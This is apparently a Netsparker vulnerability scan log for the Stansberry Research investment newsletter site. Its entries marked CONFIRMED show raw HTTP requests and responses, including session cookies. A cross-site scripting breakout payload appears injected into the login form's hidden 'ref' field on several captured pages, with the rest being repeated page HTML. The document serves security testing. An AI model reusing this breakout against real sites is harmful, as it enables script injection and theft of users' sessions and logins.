document.write("<scr" + "ipt language=\"JavaScript\" src=\"http://oascentral.stansberryresearch.com/RealMedia/ads/adstream_jx.ads/" +
oas_jx_sitepage + "/1" + RNS + "@" + oas_jx_pos + '?' + OAS_query + "\"></scr" + "ipt>");
// -->
</script></td>
</tr>
</table></td>
<td width="200" align="left" valign="middle"><table width="100%" border="0" cellpadding="5" cellspacing="0">
<tr>
<td><!--<form action="/ICA/Default.aspx" method="post">-->
<!-- <form action="/test1/Default.aspx" method="post">-->
<form action="/ICA/default.aspx" method="post">
<table width="100%" border="0" align="right" cellpadding="2" cellspacing="0" class="top_font">
<tr>
<td >User Name:
<input name="username" type="text" id="username" size="22"></td>
</tr>
<tr>
<td>Password:
<input name="password" type="password" id="password" size="22">
<input name="ref" type="hidden" value="/pub/digest/archive/2008/html/fda_essays/'"--></style></script><script>netsparker(0x002A72)</script>">
</td>
</tr>
<tr>
<td ><div align="left">
<p><input name="Submit" type="submit" class="top_font" value="Login" id="Submit1" onclick="return Submit1_onclick()">
<a href="/responses/forgot_password.asp">Forgot Password?</a></p>
</div></td>
</tr>
</table>
</form></td>
</tr>
</table></td>
</tr>
</table>
<TABLE id=main cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<hr align="center" width="775" size="1" noshade>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" align="center" cellpadding="0" cellspacing="0" id="main">
<tr>
<td width="189" align="left" valign="top" bgcolor="#FFFFFF">
<table width="183" border="0" align="left" cellpadding="1" cellspacing="0">
<tr align="left" valign="top">
<td colspan="2"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><strong><img src="/images/premium_sub_head.gif" alt="Premium Products" width="183" height="19"></strong></font></td>
</tr>
<tr align="left" valign="top">
<td width="2%">&nbsp;</td>
<td width="98%"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/trw/index.asp">True Wealth</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/psi/index.asp">Stansberry's Investment Advisory</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/oil/index.asp">S&A Resource Report</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/btr/index.asp">Advanced Income</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/twp/index.asp">The 12% Letter</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/dil/index.asp">Phase 1 Investor</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/evi/index.asp">Extreme Value</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/shr/index.asp">S&A Short Report</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/tin/index.asp">True Income</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/rem/index.asp">Retirement Millionaire</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/rtr/index.asp">Retirement Trader</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/pst/index.asp">Penny Stock Specialist</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/jrt/index.asp">Junior Resource Trader</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/gra/index.asp">S&A Grail Trader</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/tws/index.asp">True Wealth Systems</a></font></td>
</tr>

<tr align="left" valign="top">
<td width="2%"></td>
<td width="98%"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/digest/index.asp">The S&A Digest</a></font></td>
</tr>

<tr align="left" valign="top">
<td colspan="2"><img src="/images/white_fill.gif" width="1" height="1"></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.dailywealth.com" target="new window">DailyWealth</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.growthstockwire.com" target="new window">Growth Stock Wire</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.thedailycrux.com" target="new window">The Daily Crux</a></font></td>
</tr>
<tr align="left" valign="top">
<td colspan="2"><img src="/images/white_fill.gif" width="1" height="10"></td>
</tr>
<tr align="left" valign="top">
<td colspan="2"><strong><img src="/images/lifetime_sub_head.gif" alt="Lifetime Memberships" width="183" height="19"></strong></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/pal/index.asp">The S&A Alliance</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/pwa/index.asp">Private Wealth Alliance</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td>&nbsp;</td>
</tr>
</table>

</td>
<TD WIDTH="1" BGCOLOR="#cccccc"><IMG SRC="1-1.gif" WIDTH="1"
HEIGHT="1"></TD>
<td width="9" align="left" valign="top" bgcolor="#FFFFFF"> <div align="left">
</div></td>
<td width="417" align="left" valign="top" bgcolor="#FFFFFF"><table width="100%" border="0" cellspacing="0" cellpadding="2">
<tr>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><img src="/images/mdp_title_sm.gif" width="370" height="34"></font></td>
</tr>
<tr>
<td align="left" valign="top"><p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">The <em>Monthly Dividend Program</em> is S&amp;A's first-ever investment course. It's a simple, step-by-step investment program that shows you an easy way to get all the income you need, for as long as you need it, by owning the abs..
- /pub/div/

/pub/div/ CONFIRMED

Injection URL

http://www.stansberryresearch.com/responses/sign_in_error.asp

Injection Request

GET /responses/sign_in_error.asp HTTP/1.1
Referer: http://www.stansberryresearch.com/pub/digest/archive/2008/html/fda_essays.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=GEPNLMLBKNENIJCFCEJJFONJ; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=HMFBMFABKIKCAIHLCIOCILBL
Accept-Encoding: gzip, deflate

Identification Request

GET /pub/div/ HTTP/1.1
Referer: http://www.stansberryresearch.com/pub/div/index.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=GEPNLMLBKNENIJCFCEJJFONJ; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=HMFBMFABKIKCAIHLCIOCILBL
Accept-Encoding: gzip, deflate

Injection Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:45:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 12205
Content-Type: text/html
Cache-control: private



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Stansberry & Associates Investment Research</title>
<link rel="stylesheet" href="/includes/css.css" type="text/css" />
</head>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<SCRIPT LANGUAGE="JavaScript" src="http://oascentral.stansberryresearch.com/Scripts/oas_analytics.js"></SCRIPT>
<script language="JavaScript">
var RN = new String (Math.random());
var RNS = RN.substring (2,11);
var oas_jx_sitepage = "stansberry/cover";
//<!�- Define Custom Reporting Taxonomy, format is: '&Attribute1=Value1&Attribute2=Value2' -->
var OAS_taxonomy='custom=' + oas_jx_sitepage;
var OAS_query='';
OAS_query += 'XE' + '&' + OAS_taxonomy + OAS_rdl + "&if_nt_CookieAccept=" + OAS_CA + '&XE';
// -->
</script>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="427" rowspan="2"><a href="/"><img src="/images/top_logo.gif" alt="Stansberry & Associates Investment Research" width="427" height="103" border="0"></a></td>
<td width="360" height="82" align="right" valign="middle"><a href="http://signups.harborpublishing.com/fsm/signups/signup/538.html" target="_new"><img src="/images/stars_arrow.gif" border="0"></a></td>
<td width="13" align="right" valign="middle">&nbsp;</td>
</tr>
<tr>
<td colspan="2" align="right" valign="bottom"><table width="100%" border="0" align="center" cellpadding="3" cellspacing="0" class="top_font">
<tr>
<td align="right" valign="bottom"><div align="right">Customer Service: 1-888-261-2693 | <a href="/website_overview.asp" target="_blank">Website Overview</a></div></td>
<td width="6" align="right" valign="bottom">&nbsp;</td>
</tr>
</table></td>
</tr>
</table>
<table width="798" border="0" align="center" cellpadding="0" cellspacing="0">
<tr align="left" valign="top">
<td><div align="left"><a href="/"><img src="/images/home_button.gif" alt="Home" width="70" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/editors.asp"><img src="/images/editors_button.gif" alt="Meet The Editors" width="129" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/products.asp"><img src="/images/products_btn.gif" alt="In The News" width="112" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/schedule.asp"><img src="/images/pubsched_button.gif" alt="Investment Research Publishing Schedule" width="155" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/contact.asp"><img src="/images/contact_button_main.gif" alt="Contact Us" width="159" height="38" border="0"></a></div></td>
<td><div align="left"><img src="/images/login_button.gif" alt="Subscriber Login" width="173" height="38" border="0"></div></td>
</tr>
</table><script language="javascript" type="text/javascript">
// <!CDATA[

function Submit1_onclick() {

}

// ]]>
</script>



<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>
<table width="625" border="0" cellpadding="0" cellspacing="0">
<tr>
<td><script language="JavaScript">
<!--
var oas_jx_pos = "Top";
document.write("<scr" + "ipt language=\"JavaScript\" src=\"http://oascentral.stansberryresearch.com/RealMedia/ads/adstream_jx.ads/" +
oas_jx_sitepage + "/1" + RNS + "@" + oas_jx_pos + '?' + OAS_query + "\"></scr" + "ipt>");
// -->
</script></td>
</tr>
</table></td>
<td width="200" align="left" valign="middle"><table width="100%" border="0" cellpadding="5" cellspacing="0">
<tr>
<td><!--<form action="/ICA/Default.aspx" method="post">-->
<!-- <form action="/test1/Default.aspx" method="post">-->
<form action="/ICA/default.aspx" method="post">
<table width="100%" border="0" align="right" cellpadding="2" cellspacing="0" class="top_font">
<tr>
<td >User Name:
<input name="username" type="text" id="username" size="22"></td>
</tr>
<tr>
<td>Password:
<input name="password" type="password" id="password" size="22">
<input name="ref" type="hidden" value="/pub/digest/archive/2008/html/fda_essays/'"--></style></script><script>netsparker(0x002A72)</script>">
</td>
</tr>
<tr>
<td ><div align="left">
<p><input name="Submit" type="submit" class="top_font" value="Login" id="Submit1" onclick="return Submit1_onclick()">
<a href="/responses/forgot_password.asp">Forgot Password?</a></p>
</div></td>
</tr>
</table>
</form></td>
</tr>
</table></td>
</tr>
</table>
<TABLE id=main cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<hr align="center" width="775" size="1" noshade>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>

<div align="center">
<P align=center class="mid_font"><B>Please Log In </B></P>
<table width="42%" border="0" cellspacing="0" cellpadding="2">
<tr align="left" valign="top">
<td><u><span class="mid_font"><FONT color=#990000><FONT
color=#666666><font color="#000000"><B>Remember:</B></font></FONT></FONT></span></u></td>
</tr>

</table>
<P align=center class="mid_font">You must have an S&amp;A subscription to access this section. <BR>
To learn more about our publications, visit our <a href="/">home page</a>. </P>
<P align=center class="mid_font">If you are already a subscriber, check your user name and password and try logging in again. <br>
Or contact customer service at 1-888-261-2693.<font color="#FF0000"><strong> </strong></font></P>
<P align=center class="mid_font">Thank you.</P>
<P align=center class="mid_font"><FONT color=#990000><B><FONT
color=#666666><BR>
</FONT></B></FONT></P>
</div>

</td>
</tr>
</table>
<TABLE cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2><img src="/images/bottom_border.gif" width="798" height="24"></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0" id="main">
<tr>
<td align="left" valign="top"><font color="#666666" size="1" face="Verdana, Arial, Helvetica, sans-serif">&copy;2011 Stansberry & Associates Investment Research. All Rights Reserved. Protected by copyright laws of the United States and international treaties. This website may only be used pursuant to the subscription agreement and any reproduction, copying, or redistribution (electronic or otherwise, including on the world wide web), in whole or in part, is strictly prohibited without the express written permission of Stansberry & Associates Investment Research, LLC. 1217 Saint Paul Street, Baltimore MD 21202. </font> </td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" id="main">
<tr>
<td height="21" align="left" valign="top"><div align="center">
<div align="center">
<div align="left">
<DIV align=left>
<DIV align=left>
<hr width="800" size="1" noshade>
</DIV>
</DIV>
</div>
</div>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="left" valign="top"><div align="center">
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/">Home</a> | <a href="/editors.asp">Meet the Editors</a> | <a href="/news.asp">News & Events</a> | <a href="http://www.stansberryresearch.com/pub/psi/free_reports.html" target="_blank">Media &amp; Interviews</a> | <a href="/schedule.asp">Publishing Schedule</a> | <a href="/contact.asp">Contact Us</a> | <a href="/customer_service.asp">Customer Service</a><a href="/privacy.asp"><br>
</a> <a href="/pub/pal">The S&A Alliance</a> | <a href="/pub/sug">True Wealth Alliance</a> | <a href="/pub/pwa">Private Wealth Alliance</a> <br>
<a href="/pub/digest/">S&amp;A Digest</a> | <a href="http://www.dailywealth.com" target="_blank" title="DailyWealth Investment Newsletter">DailyWealth</a> | <a href="http://www.growthstockwire.com" target="_blank" title="Growth Stock Wire Investment Newsletter">Growth Stock Wire</a> | <a href="http://www.thedailycrux.com/" target="_blank">The Daily Crux<br />
</a></font><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/privacy.asp">Privacy Policy</a><br>
</font></p>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" id="main">
<tr>
<td height="21" align="left" valign="top"><div align="center">
<div align="center">
<div align="left">
<DIV align=left>
<DIV align=left>
<hr align="center" width="300" size="1" noshade>
</DIV>
</DIV>
</div>
</div>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td height="21" align="left" valign="top"><div align="center"><a href="/"><strong><img src="/images/sa_logo.gif" alt="Stansberry & Associates Investment Research" width="198" height="39" border="0"></strong></a></div></td>
</tr>
</table>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-235360-4");
pageTracker._initData();
pageTracker._trackPageview();
</script>

<!-- Google Code for S&amp;A Remarketing List -->
<script type="text/javascript">
/* <![CDATA[ */
var google_conversion_id = 1068007774;
var google_conversion_language = "en";
var google_conversion_format = "3";
var google_conversion_color = "666666";
var google_conversion_label = "AVdACPaJ0QEQ3oKi_QM";
var google_conversion_value = 0;
/* ]]> */
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
<noscript>
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1068007774/?label=AVdACPaJ0QEQ3oKi_QM&amp;guid=ON&amp;script=0"/>
</div>
</noscript>
<!-- Advertiser 'Stansberry & Associates', Include user in segment '2011 DWP - Stansberry Retargeting Pixel' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://ads.bluelithium.com/pixel?id=1539896&t=2" width="1" height="1" />
<!-- End of segment tag -->
</body>
</html>

Identification Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:45:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 23333
Content-Type: text/html
Cache-control: private



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>S&A Dividend Grabber Investment Report and Newsletter</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="description" content="The Dividend Grabber uses companies that have recently paid special dividends to guide your investment strategy.">
<meta name="keywords" content="dividend investments, investment dividends, dividend investment strategy, dividend paying stocks, high dividend stocks, stock investments, investment research, stock newsletter">
<meta name="copyright" content=" �2008 Stansberry & Associates Investment Research ">
<meta name="ROBOTS" content="ALL">
<link rel="stylesheet" href="/includes/css.css" type="text/css" />
</head>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<SCRIPT LANGUAGE="JavaScript" src="http://oascentral.stansberryresearch.com/Scripts/oas_analytics.js"></SCRIPT>
<script language="JavaScript">
var RN = new String (Math.random());
var RNS = RN.substring (2,11);
var oas_jx_sitepage = "stansberry/pub/div";
//<!�- Define Custom Reporting Taxonomy, format is: '&Attribute1=Value1&Attribute2=Value2' -->
var OAS_taxonomy='custom=' + oas_jx_sitepage;
var OAS_query='';
OAS_query += 'XE' + '&' + OAS_taxonomy + OAS_rdl + "&if_nt_CookieAccept=" + OAS_CA + '&XE';
// -->
</script>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="427" rowspan="2"><a href="/"><img src="/images/top_logo.gif" alt="Stansberry & Associates Investment Research" width="427" height="103" border="0"></a></td>
<td width="360" height="82" align="right" valign="middle"><a href="http://signups.harborpublishing.com/fsm/signups/signup/538.html" target="_new"><img src="/images/stars_arrow.gif" border="0"></a></td>
<td width="13" align="right" valign="middle">&nbsp;</td>
</tr>
<tr>
<td colspan="2" align="right" valign="bottom"><table width="100%" border="0" align="center" cellpadding="3" cellspacing="0" class="top_font">
<tr>
<td align="right" valign="bottom"><div align="right">Customer Service: 1-888-261-2693 | <a href="/website_overview.asp" target="_blank">Website Overview</a></div></td>
<td width="6" align="right" valign="bottom">&nbsp;</td>
</tr>
</table></td>
</tr>
</table>
<table width="798" border="0" align="center" cellpadding="0" cellspacing="0">
<tr align="left" valign="top">
<td><div align="left"><a href="/"><img src="/images/home_button.gif" alt="Home" width="70" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/editors.asp"><img src="/images/editors_button.gif" alt="Meet The Editors" width="129" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/products.asp"><img src="/images/products_btn.gif" alt="In The News" width="112" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/schedule.asp"><img src="/images/pubsched_button.gif" alt="Investment Research Publishing Schedule" width="155" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/contact.asp"><img src="/images/contact_button_main.gif" alt="Contact Us" width="159" height="38" border="0"></a></div></td>
<td><div align="left"><img src="/images/login_button.gif" alt="Subscriber Login" width="173" height="38" border="0"></div></td>
</tr>
</table><script language="javascript" type="text/javascript">
// <!CDATA[

function Submit1_onclick() {

}

// ]]>
</script>



<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>
<table width="625" border="0" cellpadding="0" cellspacing="0">
<tr>
<td><script language="JavaScript">
<!--
var oas_jx_pos = "Top";
document.write("<scr" + "ipt language=\"JavaScript\" src=\"http://oascentral.stansberryresearch.com/RealMedia/ads/adstream_jx.ads/" +
oas_jx_sitepage + "/1" + RNS + "@" + oas_jx_pos + '?' + OAS_query + "\"></scr" + "ipt>");
// -->
</script></td>
</tr>
</table></td>
<td width="200" align="left" valign="middle"><table width="100%" border="0" cellpadding="5" cellspacing="0">
<tr>
<td><!--<form action="/ICA/Default.aspx" method="post">-->
<!-- <form action="/test1/Default.aspx" method="post">-->
<form action="/ICA/default.aspx" method="post">
<table width="100%" border="0" align="right" cellpadding="2" cellspacing="0" class="top_font">
<tr>
<td >User Name:
<input name="username" type="text" id="username" size="22"></td>
</tr>
<tr>
<td>Password:
<input name="password" type="password" id="password" size="22">
<input name="ref" type="hidden" value="/pub/digest/archive/2008/html/fda_essays/'"--></style></script><script>netsparker(0x002A72)</script>">
</td>
</tr>
<tr>
<td ><div align="left">
<p><input name="Submit" type="submit" class="top_font" value="Login" id="Submit1" onclick="return Submit1_onclick()">
<a href="/responses/forgot_password.asp">Forgot Password?</a></p>
</div></td>
</tr>
</table>
</form></td>
</tr>
</table></td>
</tr>
</table>
<TABLE id=main cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<hr align="center" width="775" size="1" noshade>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" align="center" cellpadding="0" cellspacing="0" id="main">
<tr>
<td width="189" align="left" valign="top" bgcolor="#FFFFFF">
<table width="183" border="0" align="left" cellpadding="1" cellspacing="0">
<tr align="left" valign="top">
<td colspan="2"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><strong><img src="/images/premium_sub_head.gif" alt="Premium Products" width="183" height="19"></strong></font></td>
</tr>
<tr align="left" valign="top">
<td width="2%">&nbsp;</td>
<td width="98%"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/trw/index.asp">True Wealth</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/psi/index.asp">Stansberry's Investment Advisory</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/oil/index.asp">S&A Resource Report</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/btr/index.asp">Advanced Income</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/twp/index.asp">The 12% Letter</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/dil/index.asp">Phase 1 Investor</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/evi/index.asp">Extreme Value</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/shr/index.asp">S&A Short Report</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/tin/index.asp">True Income</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/rem/index.asp">Retirement Millionaire</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/rtr/index.asp">Retirement Trader</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/pst/index.asp">Penny Stock Specialist</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/jrt/index.asp">Junior Resource Trader</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/gra/index.asp">S&A Grail Trader</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/tws/index.asp">True Wealth Systems</a></font></td>
</tr>

<tr align="left" valign="top">
<td width="2%"></td>
<td width="98%"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/digest/index.asp">The S&A Digest</a></font></td>
</tr>

<tr align="left" valign="top">
<td colspan="2"><img src="/images/white_fill.gif" width="1" height="1"></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.dailywealth.com" target="new window">DailyWealth</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.growthstockwire.com" target="new window">Growth Stock Wire</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.thedailycrux.com" target="new window">The Daily Crux</a></font></td>
</tr>
<tr align="left" valign="top">
<td colspan="2"><img src="/images/white_fill.gif" width="1" height="10"></td>
</tr>
<tr align="left" valign="top">
<td colspan="2"><strong><img src="/images/lifetime_sub_head.gif" alt="Lifetime Memberships" width="183" height="19"></strong></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/pal/index.asp">The S&A Alliance</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/pwa/index.asp">Private Wealth Alliance</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td>&nbsp;</td>
</tr>
</table>

</td>
<TD WIDTH="1" BGCOLOR="#cccccc"><IMG SRC="1-1.gif" WIDTH="1"
HEIGHT="1"></TD>
<td width="9" align="left" valign="top" bgcolor="#FFFFFF"> <div align="left">
</div></td>
<td width="417" align="left" valign="top" bgcolor="#FFFFFF"><table width="100%" border="0" cellspacing="0" cellpadding="2">
<tr>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><img src="/images/div_title_sm.gif" alt="S&A Dividend Grabber" width="370" height="34"></font></td>
</tr>
<tr>
<td align="left" valign="top"><p><font size="2"><em><font face="Verdana, Arial, Helvetica, sans-serif">S&amp;A Dividend Grabber </font></em><font face="Verdana, Arial, Helvetica, sans-serif">is our most foolproof way to make money. </font></font&g..
- /pub/div/index.asp

/pub/div/index.asp CONFIRMED

Injection URL

http://www.stansberryresearch.com/responses/sign_in_error.asp

Injection Request

GET /responses/sign_in_error.asp HTTP/1.1
Referer: http://www.stansberryresearch.com/pub/digest/archive/2008/html/fda_essays.asp
